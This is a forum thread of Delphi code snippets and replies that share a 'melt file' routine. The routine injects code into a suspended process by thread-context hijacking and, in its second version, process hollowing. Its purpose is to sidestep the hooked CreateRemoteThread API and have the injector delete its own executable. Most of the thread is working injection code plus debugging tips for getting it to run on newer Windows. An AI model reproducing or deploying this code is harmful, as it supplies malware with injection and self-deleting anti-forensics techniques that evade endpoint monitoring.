
[SNIPPET] Melt File - Code Injection without CreateRemoteThread



cswi
09-14-2010, 02:03 PM
http://www.delphibasics.info/home/delphibasicssnippets/meltfile-codeinjectionwithoutcreateremotethread

This snippet uses the GetThreadContext and SetThreadContext APIs in place of the frequently hooked CreateRemoteThread API: the target process is created suspended, the injector's whole image is copied into it at the same base address, and the primary thread's EIP is pointed at the function to run. One disadvantage of this method is that the target thread must be suspended while its context is read and rewritten. Note also that the CreateProcess(CREATE_SUSPENDED) / VirtualAllocEx / WriteProcessMemory / SetThreadContext / ResumeThread sequence is itself a well-known injection pattern, so avoiding CreateRemoteThread alone does not make it less visible to endpoint monitoring.

Snippets here show you how to suspend and resume a process:
http://www.delphibasics.info/home/delphibasicssnippets/howtosuspendprocessresumeprocess

Author: steve10120
Compiled: Delphi 2007


program Inj;
// by steve10120
uses
Windows;

var
  // Path of this executable, filled in by MeltFile. InjectCode copies the
  // whole image into the target process at the same address, so the injected
  // MeltProc reads this same buffer there (no parameter passing is involved).
  sBuff: array[0..255] of Char;

{$R *.res}

// Runs inside the target process once InjectCode has redirected its primary
// thread here: waits briefly, then deletes the injector's executable whose
// path is in sBuff (the "melt").
// NOTE(review): this code executes from a raw, unrelocated copy of the injector
// image; Sleep and DeleteFile are reached through that copy's import table, so
// it only works while the imported DLLs sit at the same addresses in both
// processes — confirm on ASLR-enabled systems.
// NOTE(review): DeleteFile's result is ignored; if the injector has not exited
// within 500 ms the call may fail with a sharing violation and nothing retries.
procedure MeltProc();
begin
  Sleep(500);
  DeleteFile(sBuff);
end;

// Starts szProcessName suspended, copies this process's entire mapped image
// into it at the same base address, then points the new process's primary
// thread at pFunction before resuming it. pFunction is a routine in *this*
// image (MeltProc), which is why the whole image is copied rather than one
// function: the copy lands at the same address, so absolute pointers, sBuff and
// the import table keep their values — the copy is never relocated or rebound.
//
// Parameters:
//   szProcessName - command line passed to CreateProcess (the host process).
//   pFunction     - address in this image at which the target's primary thread
//                   is made to continue.
// Returns: declared Boolean, but Result is never assigned (defect) — callers
//   cannot rely on the return value.
//
// NOTE(review): none of VirtualAllocEx / WriteProcessMemory / GetThreadContext /
// SetThreadContext / ResumeThread has its result checked. If VirtualAllocEx
// fails (e.g. the range at hMod is already mapped in the target, as when both
// images share the same preferred base), pInjected is nil and the remaining
// calls operate on a null pointer.
// NOTE(review): PROCINFO.hProcess and PROCINFO.hThread are never closed.
// NOTE(review): x86-only — the 64- and 248-byte copies are the sizes of
// IMAGE_DOS_HEADER and the 32-bit IMAGE_NT_HEADERS, and TContext.Eip exists only
// in the 32-bit CONTEXT.
// NOTE(review): the context is rewritten before the target has run any code of
// its own; process initialisation in the target still runs first, so a failure
// there would surface before pFunction is ever reached — TODO confirm.
// NOTE(review): CREATE_SUSPENDED + VirtualAllocEx + WriteProcessMemory +
// SetThreadContext + ResumeThread is the textbook thread-hijacking sequence that
// endpoint monitoring commonly flags.
function InjectCode(szProcessName:string; pFunction:Pointer):Boolean;
var
  STARTINFO: TStartupInfo;
  PROCINFO: TProcessInformation;
  pFunc: Pointer;            // unused
  dSize: DWORD;              // SizeOfImage of this executable
  pInjected: Pointer;        // base of the copy inside the target
  dWritten: DWORD;
  CONTEXT: TContext;
  hMod: THandle;             // base of this executable's image
  IDH: TImageDosHeader;
  INH: TImageNtHeaders;
begin
  FillChar(STARTINFO, SizeOf(TStartupInfo), #0);
  STARTINFO.cb := SizeOf(TStartupInfo);
  // Created suspended so the primary thread's context can be replaced before
  // any of the target's own code runs.
  if CreateProcess(nil, PChar(szProcessName), nil, nil, FALSE, CREATE_SUSPENDED, nil, nil, STARTINFO, PROCINFO) then
  begin
    hMod := GetModuleHandle(nil);
    // Read our own DOS and NT headers to learn how large the mapped image is.
    CopyMemory(@IDH, Pointer(hMod), 64);
    if IDH.e_magic = IMAGE_DOS_SIGNATURE then
    begin
      CopyMemory(@INH, Pointer(hMod + IDH._lfanew), 248);
      if INH.Signature = IMAGE_NT_SIGNATURE then
      begin
        dSize := INH.OptionalHeader.SizeOfImage;
        // Allocate at exactly our own base in the target (address must match
        // for the unrelocated copy to work); RWX so the code runs under DEP.
        pInjected := VirtualAllocEx(PROCINFO.hProcess, Ptr(hMod), dSize, MEM_COMMIT or MEM_RESERVE, PAGE_EXECUTE_READWRITE);
        WriteProcessMemory(PROCINFO.hProcess, pInjected, Ptr(hMod), dSize, dWritten);
        // Keep everything in the thread's context except the instruction
        // pointer, which is redirected to pFunction.
        CONTEXT.ContextFlags := CONTEXT_FULL;
        GetThreadContext(PROCINFO.hThread, CONTEXT);
        CONTEXT.Eip := DWORD(pFunction);
        SetThreadContext(PROCINFO.hThread, CONTEXT);
        ResumeThread(PROCINFO.hThread);
      end;
    end;
  end;
end;

// Records this executable's full path in sBuff, then injects MeltProc into a
// freshly started notepad.exe so that the file is deleted from outside this
// process once it has exited.
procedure MeltFile();
const
  TargetImage = 'notepad.exe';
begin
  GetModuleFileName(0, @sBuff[0], Length(sBuff));
  InjectCode(TargetImage, @MeltProc);
end;

// Program entry point: the injector does nothing except arrange its own
// deletion and then exit.
begin
  MeltFile;
end.

steve10120
09-14-2010, 03:05 PM
You left out my credits. :(

cswi
09-14-2010, 03:37 PM
Sorry, there were no credits where I found it :(

i have added them now.

since i am talking to the author, ;)
I get a DEP error on Windows Vista. Which OS has this been tested on?

Gakh
09-14-2010, 03:51 PM
Working on Win7 32bit

steve10120
09-14-2010, 04:09 PM
It worked fine on WinXP SP2 when I wrote it. As long as the page protection of the allocation is PAGE_EXECUTE_READWRITE, DEP should not object to the copied image itself, so a DEP fault probably means execution landed somewhere outside that region. I just tried it on Win7 x64 and it fails; I fixed the CONTEXT alignment but it still fails, and it looks like a loader error.


program Test;

uses
Windows,
uGenUtils in 'uGenUtils.pas';

// Undocumented ntdll export: unmaps the section mapped at BaseAddress in the
// given process. Used here to vacate the injector's base address in the target
// before the image copy is written there. Returns an NTSTATUS, which the caller
// ignores.
// NOTE(review): ProcessHandle is declared as DWORD; THandle would match the
// Windows unit's other declarations.
function NtUnmapViewOfSection(ProcessHandle:DWORD; BaseAddress:Pointer):DWORD; stdcall; external 'ntdll';

var
  // Path of this executable, filled in by MeltFile. InjectCode copies the
  // whole image into the target process at the same address, so the injected
  // MeltProc reads this same buffer there.
  sBuff: array[0..255] of Char;

{$R *.res}

// Runs inside the target process once InjectCode has redirected its primary
// thread here: waits briefly, then deletes the injector's executable whose
// path is in sBuff.
// NOTE(review): executes from an unrelocated copy of the injector image; Sleep
// and DeleteFile go through that copy's import table and only resolve
// correctly while the imported DLLs sit at the same addresses in both
// processes — confirm on ASLR-enabled systems.
// NOTE(review): DeleteFile's result is ignored; nothing retries if the injector
// is still running after 500 ms.
procedure MeltProc();
begin
  Sleep(500);
  DeleteFile(sBuff);
end;

// Rounds dwValue up to the next multiple of dwAlign. A value that is already a
// multiple is returned unchanged, and dwAlign = 0 means "no alignment": the
// input is returned as-is instead of dividing by zero.
function Align(dwValue:DWORD; dwAlign:DWORD):DWORD;
var
  Remainder: DWORD;
begin
  Result := dwValue;
  if dwAlign = 0 then
    Exit;
  Remainder := dwValue mod dwAlign;
  if Remainder <> 0 then
    Result := (dwValue + dwAlign) - Remainder;
end;

// Starts szProcessName suspended, unmaps whatever is mapped at this
// executable's base address inside it, copies this process's entire image to
// that same address, then points the new process's primary thread at
// pFunction and resumes it. pFunction must be a routine in *this* image; the
// copy is never relocated, so it only works because it lands at its original
// base address.
//
// Parameters:
//   szProcessName - command line passed to CreateProcess (the host process).
//   pFunction     - address in this image at which the target's primary thread
//                   is made to continue.
// Returns: declared Boolean, but Result is never assigned (defect) — callers
//   cannot rely on the return value.
//
// NOTE(review): NtUnmapViewOfSection is called with *this* image's base
// (hMod), not with the target's image base read from its PEB. It therefore
// vacates the target's own image only when both executables share the same
// preferred base; otherwise it presumably unmaps nothing and the target's
// original image stays in place. In neither case is the PEB's image base
// updated — verify whether that is the Win7 x64 loader failure reported here.
// NOTE(review): the CONTEXT is heap-allocated with VirtualAlloc, which returns
// page-aligned memory, so Align(.., 4) can never change the pointer and the +4
// slack is unused; that is also the only reason VirtualFree(MEM_RELEASE)
// receives the original base address it requires.
// NOTE(review): no return value of NtUnmapViewOfSection / VirtualAllocEx /
// WriteProcessMemory / GetThreadContext / SetThreadContext / ResumeThread is
// checked, the VirtualAlloc result is not tested for nil, and
// PROCINFO.hProcess / hThread are never closed.
// NOTE(review): x86-only — the 64- and 248-byte copies are the sizes of
// IMAGE_DOS_HEADER and the 32-bit IMAGE_NT_HEADERS, DWORD(CONTEXT) truncates a
// 64-bit pointer, and TContext.Eip exists only in the 32-bit CONTEXT.
// NOTE(review): unmap + VirtualAllocEx + WriteProcessMemory + SetThreadContext
// + ResumeThread on a CREATE_SUSPENDED process is the textbook process
// hollowing sequence that endpoint monitoring commonly flags.
function InjectCode(szProcessName:string; pFunction:Pointer):Boolean;
var
  STARTINFO: TStartupInfo;
  PROCINFO: TProcessInformation;
  pFunc: Pointer;            // unused
  dSize: DWORD;              // SizeOfImage of this executable
  pInjected: Pointer;        // base of the copy inside the target
  dWritten: DWORD;
  CONTEXT: PContext;         // heap copy of the thread context
  hMod: THandle;             // base of this executable's image
  IDH: TImageDosHeader;
  INH: TImageNtHeaders;
begin
  ZeroMemory(@STARTINFO, SizeOf(TStartupInfo));
  STARTINFO.cb := SizeOf(TStartupInfo);
  // Created suspended so the primary thread's context can be replaced before
  // any of the target's own code runs.
  if CreateProcess(nil, PChar(szProcessName), nil, nil, FALSE, CREATE_SUSPENDED, nil, nil, STARTINFO, PROCINFO) then
  begin
    hMod := GetModuleHandle(nil);
    // Read our own DOS and NT headers to learn how large the mapped image is.
    CopyMemory(@IDH, Pointer(hMod), 64);
    if IDH.e_magic = IMAGE_DOS_SIGNATURE then
    begin
      CopyMemory(@INH, Pointer(hMod + IDH._lfanew), 248);
      if INH.Signature = IMAGE_NT_SIGNATURE then
      begin
        dSize := INH.OptionalHeader.SizeOfImage;
        // Free the range at our base in the target, then re-allocate it RWX
        // (the copy must sit at exactly this address; RWX keeps DEP satisfied).
        NtUnmapViewOfSection(PROCINFO.hProcess, Pointer(hMod));
        pInjected := VirtualAllocEx(PROCINFO.hProcess, Ptr(hMod), dSize, MEM_COMMIT or MEM_RESERVE, PAGE_EXECUTE_READWRITE);
        WriteProcessMemory(PROCINFO.hProcess, pInjected, Ptr(hMod), dSize, dWritten);
        // Context is taken off the heap and aligned explicitly (the author's
        // fix for an alignment problem seen on Win7 x64).
        CONTEXT := VirtualAlloc(nil, SizeOf(TContext) + 4, MEM_COMMIT, PAGE_READWRITE);
        DWORD(CONTEXT) := Align(DWORD(CONTEXT), 4);
        // Keep everything in the thread's context except the instruction
        // pointer, which is redirected to pFunction.
        CONTEXT^.ContextFlags := CONTEXT_FULL;
        GetThreadContext(PROCINFO.hThread, CONTEXT^);
        CONTEXT^.Eip := DWORD(pFunction);
        SetThreadContext(PROCINFO.hThread, CONTEXT^);
        ResumeThread(PROCINFO.hThread);
        VirtualFree(CONTEXT, 0, MEM_RELEASE);
      end;
    end;
  end;
end;

// Records this executable's full path in sBuff, then injects MeltProc into a
// freshly started copy of the test program so that the file is deleted from
// outside this process once it has exited.
procedure MeltFile();
const
  TargetImage = 'Hello - Copy.exe';
begin
  GetModuleFileName(0, @sBuff[0], Length(sBuff));
  InjectCode(TargetImage, @MeltProc);
end;

// Program entry point: the injector does nothing except arrange its own
// deletion and then exit.
begin
  MeltFile;
end.

Protocol
09-14-2010, 04:15 PM
How did you come to the conclusion that it's a loader error?

steve10120
09-14-2010, 04:29 PM
http://i55.tinypic.com/15dkzdu.png

cswi
09-18-2010, 12:02 AM
http://www.hackhound.org/forum/index.php?topic=9478.0

i found your original post on hh and you wrote:
Credits: MS-Rem for the code injection

Could you please link me to his article where he discusses this code injection?
thank you.

lobe says to try rebasing it...
"Its an old dig, but try re-basing it."

steve10120
09-18-2010, 12:41 AM
Yeah, that's right, MS-Rem made the injection. The code was found somewhere in here:

http://www.wasm.ru/author.php?author=Ms-Rem

cswi
09-18-2010, 02:44 AM
Yes, I found the example and am testing it now.

Edit: not working on Vista 32-bit.
I have to go to sleep now; I will debug it tomorrow :)